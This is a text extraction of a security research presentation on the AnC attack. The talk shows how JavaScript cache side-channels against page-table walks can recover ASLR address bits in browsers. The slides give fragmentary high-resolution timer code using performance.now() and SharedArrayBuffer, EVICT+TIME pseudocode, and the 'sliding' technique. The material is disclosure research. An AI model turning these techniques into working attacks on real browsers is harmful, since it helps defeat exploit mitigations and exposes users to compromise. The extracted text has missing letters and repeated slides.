ASLR on the Line Ben Gras, Kaveh Razavi, Erik Bosman , Herbert Bos, - - PowerPoint PPT Presentation

aslr on the line
SMART_READER_LITE
LIVE PREVIEW

ASLR on the Line Ben Gras, Kaveh Razavi, Erik Bosman , Herbert Bos, - - PowerPoint PPT Presentation

ASLR on the Line Ben Gras, Kaveh Razavi, Erik Bosman , Herbert Bos, Cris ano Giu ff rida VUSec Erik Bosman @brainsmoke Kaveh Razavi @gober Ben Gras @bjg Stephan van Schaik ASLR Address Space Layout Randomiza on Widely deployed


slide-1
SLIDE 1

ASLR on the Line

Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, Crisano Giuffrida

VUSec

slide-2
SLIDE 2

Erik Bosman

@brainsmoke

slide-3
SLIDE 3

Ben Gras

@bjg

Kaveh Razavi

@gober

Stephan van Schaik

slide-4
SLIDE 4
slide-5
SLIDE 5

ASLR

slide-6
SLIDE 6

Address Space Layout Randomizaon

Widely deployed exploit migaon strategy: Choose a different locaon for code and data every me a process is run.

slide-7
SLIDE 7

lower addresses higher addresses 2

48-1

slide-8
SLIDE 8

lower addresses higher addresses 2

48-1

slide-9
SLIDE 9

lower addresses higher addresses 2

48-1

slide-10
SLIDE 10

lower addresses higher addresses 2

48-1

slide-11
SLIDE 11

lower addresses higher addresses 2

48-1

slide-12
SLIDE 12

lower addresses higher addresses 2

48-1

slide-13
SLIDE 13

lower addresses higher addresses 2

48-1

slide-14
SLIDE 14

Address Space Layout Randomizaon

Makes life for exploit writers a bit more difficult. Usually exploits need to know the locaon

  • f certain data in memory.
slide-15
SLIDE 15

A Single Leak Reveals

  • - Joshua Drake
slide-16
SLIDE 16

Address Space Layout Randomizaon

Exploit writers need to find a bug which leaks addresses without crashing the program. ... or do they?

slide-17
SLIDE 17

This Presentaon:

A side-channel aack on processes baked into the hardware to discover ASLR informaon from Javascript in the browser. ASLR Cache (AnC) ⊕

slide-18
SLIDE 18

CPU Core L1 L2 L3 (Last Level Cache), shared between cores DDR Memory CPU Core L1 L2 CPU Core L1 L2 CPU Core L1 L2

Modern CPU architectures

slide-19
SLIDE 19

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

slide-20
SLIDE 20

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data

slide-21
SLIDE 21

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data virtual address

slide-22
SLIDE 22

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data

MMU

virtual address physical address

slide-23
SLIDE 23

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data virtual address physical address MMU TLB cache

slide-24
SLIDE 24

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data virtual address physical address MMU TLB cache PT walk miss

slide-25
SLIDE 25

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data virtual address physical address MMU TLB cache PT walk miss

slide-26
SLIDE 26

Timers in Javascript

slide-27
SLIDE 27

t0=performance.now();

  • peration();

t1=performance.now(); t = t1-t0; measured me real me

slide-28
SLIDE 28

t0=performance.now();

  • peration();

t1=performance.now(); t = t1-t0; measured me real me

slide-29
SLIDE 29

t0=performance.now();

  • peration();

t1=performance.now(); t = t1-t0; measured me real me

aer an- side-channel migaons (firefox) aer an- side-channel migaons (firefox)

slide-30
SLIDE 30

c = 0; t0 = p.now(); while(t0 == p.now()); t1 = p.now();

  • peration();

while(t1 == p.now()) { c++; } measured me real me

aer an- side-channel migaons (firefox)

slide-31
SLIDE 31

c = 0; t0 = p.now(); while(t0 == p.now()); t1 = p.now();

  • peration();

while(t1 == p.now()) { c++; } measured me real me

aer an- side-channel migaons (firefox)

slide-32
SLIDE 32

c = 0; t0 = p.now(); while(t0 == p.now()); t1 = p.now();

  • peration();

while(t1 == p.now()) { c++; } measured me real me

aer an- side-channel migaons (firefox)

slide-33
SLIDE 33

c = 0; t0 = p.now(); while(t0 == p.now()); t1 = p.now();

  • peration();

while(t1 == p.now()) { c++; } measured me real me

aer an- side-channel migaons (firefox)

slide-34
SLIDE 34

c = 0; t0 = p.now(); while(t0 == p.now()); t1 = p.now();

  • peration();

while(t1 == p.now()) { c++; } measured me real me

aer an- side-channel migaons (firefox) aer an- side-channel migaons (firefox)

slide-35
SLIDE 35

c = 0; t0 = p.now(); while(t0 == p.now()); t1 = p.now();

  • peration();

while(t1 == p.now()) { c++; } measured me real me

aer an- side-channel migaons (chrome) aer an- side-channel migaons (chrome)

slide-36
SLIDE 36

new SharedArrayBuffer()

slide-37
SLIDE 37

memory which may be shared between mulple worker threads.

new SharedArrayBuffer()

slide-38
SLIDE 38

enabled by default by Firefox, Chrome and Edge since 2017 memory which may be shared between mulple worker threads.

new SharedArrayBuffer()

slide-39
SLIDE 39

let SharedRowhammerBuffer = SharedArrayBuffer;

slide-40
SLIDE 40

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-41
SLIDE 41

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-42
SLIDE 42

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-43
SLIDE 43

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-44
SLIDE 44

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-45
SLIDE 45

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-46
SLIDE 46

c=0; while (buf[0] == 0); while (buf[0] == 1) { c++; } buf[0]=1;

  • peration();

buf[0]=0;

1 2

measured me real me

using SharedArrayBuffer and worker threads

slide-47
SLIDE 47

Cache Side-Channels

slide-48
SLIDE 48

cache line (64 bytes) memory memory access data physical address

slide-49
SLIDE 49

L3 cache N-way associave cache set 1 cache set memory memory access data physical address

slide-50
SLIDE 50

L3 cache

...

2048 cache sets with 64 byte cache lines memory memory access data physical address

slide-51
SLIDE 51

L3 cache

...

as many slices as cores

... ... ...

memory memory access data physical address

slide-52
SLIDE 52

L3 cache

...

memory memory access data physical address

slide-53
SLIDE 53

L3 cache

...

cache_set = (addr >> 6) % 2048, direct mapping, repeated every 128KB memory memory access data physical address

slide-54
SLIDE 54

L3 cache

...

cache_set = (addr >> 6) % 2048, cache_slice = xor_hash(addr) direct mapping, repeated every 128KB memory memory access data physical address

slide-55
SLIDE 55

L3 cache cache_set = (addr >> 6) % 2048, direct mapping, repeated every 128KB memory memory access data physical address

slide-56
SLIDE 56

L3 cache cache_set = (addr >> 6) % 2048, two cache lines mapping to the same cache set have the same physical address modulo 128KB direct mapping, repeated every 128KB memory memory access data physical address

slide-57
SLIDE 57

L3 cache cache_set = (addr >> 6) % 2048, two cache lines mapping to the same cache set have the same physical address modulo 4KB direct mapping, repeated every 128KB memory memory access data physical address

slide-58
SLIDE 58

L3 cache two cache lines mapping to the same cache set have the same

  • ffset into their

memory page memory memory access data physical address 1 page = 64 cache lines

slide-59
SLIDE 59

L3 cache EVICT + TIME (does an operaon use a specific cache line?)

slide-60
SLIDE 60

L3 cache EVICT + TIME (does an operaon use a specific cache line?) evict(line_x); time(); t0 = time();

  • peration();

t = time()-t0;

slide-61
SLIDE 61

L3 cache EVICT + TIME (does an operaon use a specific cache line?) evict(line_x); time(); t0 = time();

  • peration();

t = time()-t0;

slide-62
SLIDE 62

L3 cache EVICT + TIME (does an operaon use a specific cache line?)

X mybuf X X X ...

evict(line_x); time(); t0 = time();

  • peration();

t = time()-t0;

slide-63
SLIDE 63

L3 cache EVICT + TIME (does an operaon use a specific cache line?)

X mybuf X X X ...

evict(line_x); time(); t0 = time();

  • peration();

t = time()-t0;

X X X X X X X X X X X X

...

slide-64
SLIDE 64

L3 cache EVICT + TIME (does an operaon use a specific cache line?)

X mybuf X X X ...

evict(line_x); time(); t0 = time();

  • peration();

t = time()-t0;

X X X X X X X X X X X X

...

slide-65
SLIDE 65

L3 cache EVICT + TIME (does an operaon use a specific cache line?)

X mybuf X X X ...

evict(line_x); time(); t0 = time();

  • peration();

t = time()-t0;

X X X X X X X X X X X X

... trigger memory access (or not)

slide-66
SLIDE 66

CPU Core

L1 code / L1 data L2 L3 (Last Level Cache), shared between cores

... ...

memory access data virtual address physical address MMU TLB cache PT walk miss

slide-67
SLIDE 67

Page Tables

slide-68
SLIDE 68

lower addresses higher addresses 2

48-1

slide-69
SLIDE 69

CR3 512 entries covering 512GB each 2

48-1

slide-70
SLIDE 70

CR3 512 entries covering 1GB each 2

48-1

slide-71
SLIDE 71

CR3 512 entries covering 2MB each 2

48-1

slide-72
SLIDE 72

CR3 512 entries poinng to 4096 byte regions in memory 2

48-1

slide-73
SLIDE 73

CR3 2

48-1

slide-74
SLIDE 74

7F83B6372040

virtual address lookup (x86_64)

slide-75
SLIDE 75

7F83B6372040

virtual address lookup (x86_64)

7 F 8 3 B 6 3 7 3 4

slide-76
SLIDE 76

TLB miss!

slide-77
SLIDE 77

CR3

slide-78
SLIDE 78

CR3 512 entries 511

slide-79
SLIDE 79

255

CR3 512 entries 511

slide-80
SLIDE 80

255

CR3 512 entries

slide-81
SLIDE 81

255

CR3

14

512 entries

slide-82
SLIDE 82

255

CR3

14

512 entries

slide-83
SLIDE 83

255

CR3

14 433

512 entries

slide-84
SLIDE 84

255

CR3

14 433

512 entries

slide-85
SLIDE 85

255

CR3

14 433 370

512 entries

slide-86
SLIDE 86

255

CR3

14 433 370

actual data

slide-87
SLIDE 87

255

CR3

14 433 370

actual data

64

slide-88
SLIDE 88

255

CR3

14 433 370

actual data 4K page

64

slide-89
SLIDE 89

255

CR3

14 433 370

4K page

64

slide-90
SLIDE 90

255

CR3

14 433 370

4K page

64

slide-91
SLIDE 91

address informaon is directly encoded into the page table lookups, and page tables are pages themselves.

Observaon:

slide-92
SLIDE 92

255

CR3

14 433 370

4K page

64

slide-93
SLIDE 93

255

CR3

14 433 370

4K page

64

4K page 4K page 4K page 4K page

slide-94
SLIDE 94

255

CR3

14 433 370

4K page

64

4K page 4K page 4K page 4K page

slide-95
SLIDE 95

CR3

slide-96
SLIDE 96

... ...

255 254 253 252 251 250 249 248 256 247 255

slide-97
SLIDE 97

?

... ...

255 254 253 252 251 250 249 248 256 247 255 1 Cache line = 64 bytes = 8 possible page table entries

slide-98
SLIDE 98

?

... ...

255 254 253 252 251 250 249 248 256 247 255 1 Cache line = 64 bytes = 8 possible page table entries

slide-99
SLIDE 99

?

... ...

255 254 253 252 251 250 249 248 256 247 255 1 Cache line = 64 bytes = 8 possible page table entries cache line reveals 6 address bits

slide-100
SLIDE 100

64 370 433 14 255

slide-101
SLIDE 101

64 370 433 14 255

slide-102
SLIDE 102

64 370 433 14 255 locaon within the page known by studying browser memory allocator

slide-103
SLIDE 103

64 370 433 14 255

slide-104
SLIDE 104

64 370 433 14 255

max entropy le:

slide-105
SLIDE 105

? ? ? ?

max entropy le:

slide-106
SLIDE 106

? ? ? ?

max entropy le: 4*3 bits + ...

slide-107
SLIDE 107

? ? ? ?

which hit belongs to which cache line? max entropy le: 4*3 bits + ...

slide-108
SLIDE 108

? ? ? ?

which hit belongs to which cache line? max entropy le: 4*3 bits + log2( 4 * 3 * 2 * 1 )

slide-109
SLIDE 109

? ? ? ?

which hit belongs to which cache line? max entropy le: ~ 16.6 bits

slide-110
SLIDE 110

allocate a buffer perform this side-channel aack on buffer entries 4096 bytes apart measure when the page table lookup crosses a cache line boundary

Sliding

slide-111
SLIDE 111

... ...

375 374 373 372 371 370 369 368 376 367 370

slide-112
SLIDE 112

... ...

375 374 373 372 371 370 369 368 376 367 371 +4096 bytes

slide-113
SLIDE 113

... ...

375 374 373 372 371 370 369 368 376 367 372 +4096 bytes +4096 bytes

slide-114
SLIDE 114

... ...

375 374 373 372 371 370 369 368 376 367 373 +4096 bytes +4096 bytes +4096 bytes

slide-115
SLIDE 115

... ...

375 374 373 372 371 370 369 368 376 367 374 +4096 bytes +4096 bytes +4096 bytes +4096 bytes

slide-116
SLIDE 116

... ...

375 374 373 372 371 370 369 368 376 367 375 +4096 bytes +4096 bytes +4096 bytes +4096 bytes +4096 bytes

slide-117
SLIDE 117

376 +4096 bytes +4096 bytes +4096 bytes +4096 bytes +4096 bytes +4096 bytes

... ...

375 374 373 372 371 370 369 368 367 376

slide-118
SLIDE 118

we can do the same thing for the 2nd level page table

Sliding

slide-119
SLIDE 119

... ...

439 438 437 436 435 434 433 432 440 431 433

slide-120
SLIDE 120

... ...

439 438 437 436 435 434 433 432 440 431 434 +2MB

slide-121
SLIDE 121

... ...

439 438 437 436 435 434 433 432 440 431 435 +2MB +2MB

slide-122
SLIDE 122

... ...

439 438 437 436 435 434 433 432 440 431 436 +2MB +2MB +2MB

slide-123
SLIDE 123

... ...

439 438 437 436 435 434 433 432 440 431 437 +2MB +2MB +2MB +2MB

slide-124
SLIDE 124

... ...

439 438 437 436 435 434 433 432 440 431 438 +2MB +2MB +2MB +2MB +2MB

slide-125
SLIDE 125

... ...

439 438 437 436 435 434 433 432 440 431 439 +2MB +2MB +2MB +2MB +2MB +2MB

slide-126
SLIDE 126

... ...

439 438 437 436 435 434 433 432 440 431 440 +2MB +2MB +2MB +2MB +2MB +2MB +2MB

slide-127
SLIDE 127

? ?

slide-128
SLIDE 128

? ?

slide-129
SLIDE 129

? ?

max entropy le: 2*3 + log2(2 * 1) = 7 bits

slide-130
SLIDE 130

... ...

15 14 13 12 11 10 9 8 16 7 +1GB 14

slide-131
SLIDE 131

... ...

255 254 253 252 251 250 249 248 256 247 255 +512GB

slide-132
SLIDE 132

Firefox (on Linux) does not inialize ArrayBuffers, so linux does not allocate space for the actual pages We can allocate huge chunks and use sliding to recover the whole address

Allocang large chunks of memory

slide-133
SLIDE 133

Chrome does inialize memory, but jumps ahead in the address space every me it creates a new heap 3rd level address bits can be recovered, 4'th level bits needs chrome to inialize/free up to 4TB :-)

Allocang large chunks of memory

slide-134
SLIDE 134 CPU Model Microa rchitecture Y ea r Intel Xeon E3-1240 v5 Skylake 2015 Intel Core i7-6700K Skylake 2015 Intel Celeron N2840 Silverm
  • nt
2014 Intel Xeon E5-2658 v2 Ivy Bridge EP 2013 Intel Atom C2750 Silverm
  • nt
2013 Intel Core i7-4500U Haswell 2013 Intel Core i7-3632QM Ivy Bridge 2012 Intel Core i7-2620QM Sandy Bridge 2011 Intel Core i5 M480 Westm ere 2010 Intel Core i7 920 Nehalem 2008 AMD FX-8350 8-Core Piledriver 2012 AMD FX-8320 8-Core Piledriver 2012 AMD FX-8120 8-Core Bulldozer 2011 AMD Athlon II 640 X4 K10 2010 AMD E-350 Bobcat 2010 AMD Phenom 9550 4-Core K10 2008 Allwinner A64 ARM Cortex A53 2016 Sam sung Exynos 5800 ARM Cortex A15 2014 Sam sung Exynos 5800 ARM Cortex A7 2014 Nvidia Tegra K1 CD580M-A1 ARM Cortex A15 2014 Nvidia Tegra K1 CD570M-A1 ARM Cortex A15; LPAE 2014

This side-channel was detected on 22 out of 22 tested architectures!

slide-135
SLIDE 135

Demo video

slide-136
SLIDE 136

Conclusions

  • Browser vendors seem to have given up on

protecng against side-channel aacks in favor of adding features :,-(

  • It's possible to perform cache side-channel

aacks from Javascript on the Memory Managment Unit to recover ASLR informaon

slide-137
SLIDE 137

Any Quesons?

VUSec

project page: hps://vusec.net/projects/anc